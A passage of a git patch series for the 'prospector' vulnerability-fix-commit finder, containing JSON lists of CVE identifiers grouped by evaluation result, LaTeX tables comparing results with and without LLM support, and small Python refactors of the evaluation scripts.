"CVE-2018-15727", + "CVE-2018-15756", + "CVE-2018-15758", + "CVE-2018-16468", + "CVE-2018-16471", + "CVE-2018-16733", + "CVE-2018-16837", + "CVE-2018-16859", + "CVE-2018-16876", + "CVE-2018-16886", + "CVE-2018-16984", + "CVE-2018-17057", + "CVE-2018-17175", + "CVE-2018-17246", + "CVE-2018-18074", + "CVE-2018-18206", + "CVE-2018-18854", + "CVE-2018-18893", + "CVE-2018-18926", + "CVE-2018-19133", + "CVE-2018-19351", + "CVE-2018-19352", + "CVE-2018-19370", + "CVE-2018-19620", + "CVE-2018-19787", + "CVE-2018-20000", + "CVE-2018-20227", + "CVE-2018-20745", + "CVE-2018-20756", + "CVE-2018-20834", + "CVE-2018-20975", + "CVE-2018-1000060", + "CVE-2018-1000088", + "CVE-2018-1000096", + "CVE-2018-1000118", + "CVE-2018-1000159", + "CVE-2018-1000539", + "CVE-2018-1000559", + "CVE-2018-1000613", + "CVE-2018-1000644", + "CVE-2018-1000665", + "CVE-2018-1000803", + "CVE-2018-1000809", + "CVE-2018-1000820", + "CVE-2018-1000822", + "CVE-2018-1000854", + "CVE-2018-1000855", + "CVE-2018-1000872", + "CVE-2018-1002101", + "CVE-2018-1002105", + "CVE-2018-1002150", + "CVE-2018-1002200", + "CVE-2018-1002203", + "CVE-2018-1002204", + "CVE-2018-1002205", + "CVE-2019-0194", + "CVE-2019-0201", + "CVE-2019-0210", + "CVE-2019-0226", + "CVE-2019-0228", + "CVE-2019-1001", + "CVE-2019-1552", + "CVE-2019-3465", + "CVE-2019-3498", + "CVE-2019-3774", + "CVE-2019-3799", + "CVE-2019-3808", + "CVE-2019-3810", + "CVE-2019-3847", + "CVE-2019-3850", + "CVE-2019-3888", + "CVE-2019-3894", + "CVE-2019-5018", + "CVE-2019-5421", + "CVE-2019-5448", + "CVE-2019-5477", + "CVE-2019-6802", + "CVE-2019-6975", + "CVE-2019-7313", + "CVE-2019-7537", + "CVE-2019-7644", + "CVE-2019-8903", + "CVE-2019-9153", + "CVE-2019-9154", + "CVE-2019-9155", + "CVE-2019-9512", + "CVE-2019-9826", + "CVE-2019-9942", + "CVE-2019-10071", + "CVE-2019-10072", + "CVE-2019-10086", + "CVE-2019-10094", + "CVE-2019-10158", + "CVE-2019-10174", + "CVE-2019-10184", + "CVE-2019-10206", + "CVE-2019-10219", + "CVE-2019-10246", + "CVE-2019-10247", + "CVE-2019-10249", + "CVE-2019-10255", + "CVE-2019-10354", + "CVE-2019-10641", + "CVE-2019-10754", + "CVE-2019-10763", + "CVE-2019-10766", + "CVE-2019-10768", + "CVE-2019-10770", + "CVE-2019-10773", + "CVE-2019-10774", + "CVE-2019-10806", + "CVE-2019-10874", + "CVE-2019-10912", + "CVE-2019-11016", + "CVE-2019-11082", + "CVE-2019-11244", + "CVE-2019-11245", + "CVE-2019-11269", + "CVE-2019-11289", + "CVE-2019-11325", + "CVE-2019-11328", + "CVE-2019-11405", + "CVE-2019-11458", + "CVE-2019-11470", + "CVE-2019-11808", + "CVE-2019-12041", + "CVE-2019-12086", + "CVE-2019-12203", + "CVE-2019-12245", + "CVE-2019-12308", + "CVE-2019-12313", + "CVE-2019-12387", + "CVE-2019-12418", + "CVE-2019-12419", + "CVE-2019-12422", + "CVE-2019-12423", + "CVE-2019-12617", + "CVE-2019-12748", + "CVE-2019-12781", + "CVE-2019-14262", + "CVE-2019-14280", + "CVE-2019-14838", + "CVE-2019-14892", + "CVE-2019-14933", + "CVE-2019-15062", + "CVE-2019-15477", + "CVE-2019-15482", + "CVE-2019-15483", + "CVE-2019-15484", + "CVE-2019-15485", + "CVE-2019-15486", + "CVE-2019-15587", + "CVE-2019-15599", + "CVE-2019-15608", + "CVE-2019-15782", + "CVE-2019-16060", + "CVE-2019-16097", + "CVE-2019-16145", + "CVE-2019-16403", + "CVE-2019-16768", + "CVE-2019-16770", + "CVE-2019-16772", + "CVE-2019-16774", + "CVE-2019-16782", + "CVE-2019-16869", + "CVE-2019-16884", + "CVE-2019-16942", + "CVE-2019-16943", + "CVE-2019-17206", + "CVE-2019-17223", + "CVE-2019-17359", + "CVE-2019-17383", + "CVE-2019-17426", + "CVE-2019-17554", + "CVE-2019-17563", + "CVE-2019-17569", + "CVE-2019-17632", + "CVE-2019-18841", + "CVE-2019-18886", + "CVE-2019-18887", + "CVE-2019-18888", + "CVE-2019-18923", + "CVE-2019-18954", + "CVE-2019-19118", + "CVE-2019-19274", + "CVE-2019-19316", + "CVE-2019-19325", + "CVE-2019-19844", + "CVE-2019-19919", + "CVE-2019-20444", + "CVE-2019-1000007", + "CVE-2019-1002101", + "CVE-2019-1010142", + "CVE-2019-1010306", + "CVE-2020-1935", + "CVE-2020-1937", + "CVE-2020-1938", + "CVE-2020-1940", + "CVE-2020-5215", + "CVE-2020-5223", + "CVE-2020-5230", + "CVE-2020-5233", + "CVE-2020-5237", + "CVE-2020-5243", + "CVE-2020-5245", + "CVE-2020-5247", + "CVE-2020-5310", + "CVE-2020-5311", + "CVE-2020-5312", + "CVE-2020-5313", + "CVE-2020-5398", + "CVE-2020-6802", + "CVE-2020-6816", + "CVE-2020-7212", + "CVE-2020-7219", + "CVE-2020-7596", + "CVE-2020-7598", + "CVE-2020-7608", + "CVE-2020-8116", + "CVE-2020-8134", + "CVE-2020-8840", + "CVE-2020-8945", + "CVE-2020-9402", + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548", + "CVE-2020-10594" + ], + "aborted": [ + "CVE-2009-0217", + "CVE-2015-1169", + "CVE-2015-3208", + "CVE-2015-6826", + "CVE-2015-7577", + "CVE-2016-5386", + "CVE-2017-5643", + "CVE-2017-8658", + "CVE-2017-14695", + "CVE-2018-10055", + "CVE-2018-11804", + "CVE-2018-20713", + "CVE-2018-1002102", + "CVE-2019-10154" + ], + "missing": [ + "CVE-2009-0217", + "CVE-2015-1169", + "CVE-2015-3208", + "CVE-2015-6826", + "CVE-2015-7577", + "CVE-2016-5386", + "CVE-2017-5643", + "CVE-2017-8658", + "CVE-2017-14695", + "CVE-2018-10055", + "CVE-2018-11804", + "CVE-2018-20713", + "CVE-2018-1002102", + "CVE-2019-10154" + ] + } + } + ] +} \ No newline at end of file diff --git a/prospector/evaluation/data/results/summary_execution_nvi_table.tex b/prospector/evaluation/data/results/summary_execution_nvi_table.tex new file mode 100644 index 000000000..d3bdd8f78 --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_nvi_table.tex @@ -0,0 +1,32 @@ +\begin{table} + \centering + % \tiny + \begin{tabular}{| l c c c c|} + \rowcolor{gray!50} \textbf{Result} & \textbf{Without LLM} & \textbf{\%} & \textbf{With LLM} & \textbf{\%} \\ \hline + High confidence & 899 & 69.58 & 977 & 75.62 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad Commit in reference* \\ + \end{tabular} & 835 & 92.88 & 835 & 85.47 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad CVE ID in message* \\ + \end{tabular} & 122 & 13.57 & 123 & 12.59 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad CVE ID in Issue* \\ + \end{tabular} & 32 & 3.56 & 32 & 3.28 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad Cross Reference* \\ + \end{tabular} & 322 & 35.82 & 319 & 32.65 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad Commit is Security Relevant* \\ + \end{tabular} & 0 & 0.0 & 857 & 66.33 \\ + Medium confidence & 82 & 6.35 & 10 & 0.77 \\ + Low confidence & 14 & 1.08 & 8 & 0.62 \\ + Not found (rank $> 10$) & 31 & 2.4 & 30 & 2.32 \\ + Not reported & 243 & 18.81 & 85 & 6.58 \\ + False Positive & 23 & 1.78 & 182 & 14.09 \\ + Aborted (candidate and time limit exceeded) & 27 & 2.09 & 27 & 2.09 \\ + \textbf{Total} & \textbf{1292} & & \textbf{1292} & \\ \hline + \end{tabular} + \caption{Evaluation Results without version interval (* percentage of high confidence category)} + \label{tab:tracer_dataset_results_nvi} +\end{table} \ No newline at end of file diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 533d14f84..6186c4e8e 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -6,15 +6,6 @@ from core.prospector import prospector from core.report import generate_report -from data_sources.nvd.filter_entries import ( - process_entries, - retrieve_vulns, - save_vuln_to_db, -) -from data_sources.nvd.job_creation import ( - create_prospector_job, - run_prospector, -) from evaluation.create_jobs import _create_prospector_job, enqueue_jobs from evaluation.utils import ( INPUT_DATA_PATH, @@ -137,30 +128,3 @@ def empty_queue(): queue.empty() print("Emptied the queue.") - - -async def dispatch_jobs_with_api(filename: str, selected_cves: str): - """Dispatches jobs to the queue.""" - # Retrieve CVE data - cve_data = await retrieve_vulns(10) - - # Save raw CVE data to the database - save_vuln_to_db(cve_data) - - # Process and filter the new CVE data and save results to the database - processed_vulns = await process_entries() - - print("CVEs ready to be enqueued.") - - # Enqueue jobs for new processed CVEs - await enqueue_jobs() - - -def start(): - # vuln_id = "CVE-2018-14840" - # repo_url = "https://github.com/intelliants/subrion" - # v_int = "4.2.1:4.2.2" - vuln_id = "CVE-2010-0156" - repo_url = "https://github.com/puppetlabs/puppet" - v_int = "0.25.1:0.25.2" - _create_prospector_job(vuln_id, repo_url, v_int) diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 5e266e0c3..829b74ddf 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -33,10 +33,9 @@ def save_dict_to_json(dictionary: dict, path: str): return json.dump(dictionary, file, indent=4) -def update_summary_execution_table( - results: dict, total: str, filepath: str -) -> None: - """Updates the LaTeX table at {ANALYSIS_RESULTS_PATH}/`filepath`. +def update_summary_execution_table(results: dict, total: str) -> None: + """Updates the LaTeX table at {ANALYSIS_RESULTS_PATH}/summary_execution_ + [mvi|nvi]_table.tex. Params: results (dict): Dictionary with result counts. @@ -68,11 +67,11 @@ def update_summary_execution_table( # Choose which column to update: if config.version_interval: - filepath = ANALYSIS_RESULTS_PATH + "summary_execution/mvi_table.tex" + filepath = ANALYSIS_RESULTS_PATH + "summary_execution_mvi_table.tex" col_indices = [1, 2] if not config.llm_support else [3, 4] else: - filepath = ANALYSIS_RESULTS_PATH + "summary_execution/nvi_table.tex" + filepath = ANALYSIS_RESULTS_PATH + "summary_execution_nvi_table.tex" col_indices = [1, 2] if not config.llm_support else [3, 4] with open(filepath, "r") as file: From bfe4ffa34d7785efb087a0b9ac0d25c96e4b1d7f Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 30 Aug 2024 09:38:47 +0000 Subject: [PATCH 127/130] [IMP] changes main file to use registry pattern for selection of function to execute --- prospector/evaluation/analyse.py | 2 +- .../results/summary_execution_mvi_table.tex | 24 +- .../summary_execution_mvi_with_llm.json | 2481 +++++++++++++++++ prospector/evaluation/main.py | 205 +- 4 files changed, 2556 insertions(+), 156 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 9572dc86b..61b50f4aa 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -65,7 +65,7 @@ def analyse_prospector_reports(filename: str, selected_cves: str): dataset = load_dataset(file) # dataset = dataset[:100] # Actual line number in D53.csv -2 # dataset = dataset[198:199] # Actual line number in D53.csv -2 - if len(selected_cves) != 0: + if selected_cves != "all" and len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] # Keep track of how many reports were attempted to be analysed diff --git a/prospector/evaluation/data/results/summary_execution_mvi_table.tex b/prospector/evaluation/data/results/summary_execution_mvi_table.tex index 12e81a305..35e8c3848 100644 --- a/prospector/evaluation/data/results/summary_execution_mvi_table.tex +++ b/prospector/evaluation/data/results/summary_execution_mvi_table.tex @@ -3,28 +3,28 @@ % \tiny \begin{tabular}{| l c c c c |} \rowcolor{gray!50} \textbf{Result} & \textbf{Without LLM} & \textbf{\%} & \textbf{With LLM} & \textbf{\%} \\ \hline - High confidence & 960 & 73.56 & 548 & 41.99 \\ + High confidence & 960 & 73.56 & 548 & 41.99 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad Commit in reference* \\ - \end{tabular} & 847 & 88.23 & 413 & 75.36 \\ + \end{tabular} & 847 & 88.23 & 413 & 75.36 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad CVE ID in message* \\ - \end{tabular} & 162 & 16.88 & 69 & 12.59 \\ + \end{tabular} & 162 & 16.88 & 69 & 12.59 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad CVE ID in Issue* \\ - \end{tabular} & 37 & 3.85 & 12 & 2.19 \\ + \end{tabular} & 37 & 3.85 & 12 & 2.19 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad Cross Reference* \\ - \end{tabular} & 339 & 35.31 & 135 & 24.64 \\ + \end{tabular} & 339 & 35.31 & 135 & 24.64 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad Commit is Security Relevant* \\ - \end{tabular} & 0 & 0.0 & 488 & 37.39 \\ - Medium confidence & 179 & 13.72 & 18 & 1.38 \\ - Low confidence & 9 & 0.69 & 6 & 0.46 \\ - Not found (rank $> 10$) & 31 & 2.38 & 11 & 0.84 \\ - Not reported & 103 & 7.89 & 44 & 3.37 \\ - False Positive & 23 & 1.76 & 678 & 51.95 \\ - Aborted (due to exceeding candidate limit) & 14 & 1.07 & 14 & 1.07 \\ + \end{tabular} & 0 & 0.0 & 488 & 37.39 \\ + Medium confidence & 179 & 13.72 & 18 & 1.38 \\ + Low confidence & 9 & 0.69 & 6 & 0.46 \\ + Not found (rank $> 10$) & 31 & 2.38 & 11 & 0.84 \\ + Not reported & 103 & 7.89 & 44 & 3.37 \\ + False Positive & 23 & 1.76 & 678 & 51.95 \\ + Aborted (due to exceeding candidate limit) & 14 & 1.07 & 14 & 1.07 \\ \textbf{Total} & \textbf{1305} & & \textbf{1305} & \\ \hline \end{tabular} \caption{Prospector Evaluation Results (* percentage of high confidence category)} diff --git a/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json b/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json index a5e22b24a..874c41197 100644 --- a/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json +++ b/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json @@ -2480,6 +2480,2487 @@ "CVE-2019-10154" ] } + }, + { + "timestamp": "30-08-2024, 09:37", + "results": { + "high": [ + "CVE-2010-5312", + "CVE-2011-1950", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-3923", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1109", + "CVE-2012-1176", + "CVE-2012-2378", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-3536", + "CVE-2012-5812", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1607", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2013-2013", + "CVE-2013-2035", + "CVE-2013-2172", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4111", + "CVE-2013-4116", + "CVE-2013-4316", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1202", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-2525", + "CVE-2014-3120", + "CVE-2014-3250", + "CVE-2014-3488", + "CVE-2014-3576", + "CVE-2014-3577", + "CVE-2014-3579", + "CVE-2014-3599", + "CVE-2014-3612", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-7809", + "CVE-2014-8115", + "CVE-2014-8152", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2014-9970", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1772", + "CVE-2015-1782", + "CVE-2015-1838", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4410", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-5147", + "CVE-2015-6524", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7337", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-8854", + "CVE-2015-8862", + "CVE-2015-9235", + "CVE-2015-9241", + "CVE-2016-0750", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3114", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4000", + "CVE-2016-4442", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-4974", + "CVE-2016-4977", + "CVE-2016-5007", + "CVE-2016-5104", + "CVE-2016-5180", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-8738", + "CVE-2016-9298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10528", + "CVE-2016-10529", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10558", + "CVE-2016-10559", + "CVE-2016-10560", + "CVE-2016-10575", + "CVE-2016-10577", + "CVE-2016-10591", + "CVE-2016-10611", + "CVE-2016-10694", + "CVE-2016-10703", + "CVE-2016-10735", + "CVE-2016-1000236", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2617", + "CVE-2017-2652", + "CVE-2017-2667", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-4973", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5641", + "CVE-2017-5645", + "CVE-2017-5858", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-7674", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-9796", + "CVE-2017-11173", + "CVE-2017-11427", + "CVE-2017-11467", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-12098", + "CVE-2017-12616", + "CVE-2017-12620", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15052", + "CVE-2017-15053", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15703", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15879", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16007", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16136", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16877", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000389", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1260", + "CVE-2018-1261", + "CVE-2018-1263", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3714", + "CVE-2018-3715", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3731", + "CVE-2018-3732", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7408", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8013", + "CVE-2018-8016", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10366", + "CVE-2018-10903", + "CVE-2018-10936", + "CVE-2018-11093", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-13818", + "CVE-2018-14041", + "CVE-2018-14637", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16459", + "CVE-2018-16462", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16490", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17197", + "CVE-2018-17419", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19048", + "CVE-2018-19184", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20801", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000013", + "CVE-2018-1000014", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2018-1999024", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1196", + "CVE-2019-1197", + "CVE-2019-3564", + "CVE-2019-3826", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-7617", + "CVE-2019-7722", + "CVE-2019-8331", + "CVE-2019-8457", + "CVE-2019-9212", + "CVE-2019-9658", + "CVE-2019-9844", + "CVE-2019-10131", + "CVE-2019-10157", + "CVE-2019-10217", + "CVE-2019-10240", + "CVE-2019-10241", + "CVE-2019-10248", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-10682", + "CVE-2019-10745", + "CVE-2019-10748", + "CVE-2019-10749", + "CVE-2019-10750", + "CVE-2019-10751", + "CVE-2019-10752", + "CVE-2019-10760", + "CVE-2019-10762", + "CVE-2019-10764", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10778", + "CVE-2019-10780", + "CVE-2019-10781", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10797", + "CVE-2019-10799", + "CVE-2019-10867", + "CVE-2019-10904", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11512", + "CVE-2019-11514", + "CVE-2019-11767", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12402", + "CVE-2019-12404", + "CVE-2019-12407", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13209", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14806", + "CVE-2019-14837", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15657", + "CVE-2019-15658", + "CVE-2019-16197", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16761", + "CVE-2019-16762", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17496", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18889", + "CVE-2019-18978", + "CVE-2019-18981", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19212", + "CVE-2019-19275", + "CVE-2019-19507", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1010266", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-5219", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5232", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-6836", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8125", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "COMMIT_IN_REFERENCE": [ + "CVE-2010-5312", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1109", + "CVE-2012-1176", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-2013", + "CVE-2013-2035", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4116", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1202", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-3120", + "CVE-2014-3488", + "CVE-2014-3579", + "CVE-2014-3599", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-8115", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1838", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4410", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-5147", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7337", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-9235", + "CVE-2015-9241", + "CVE-2016-0750", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4442", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-5104", + 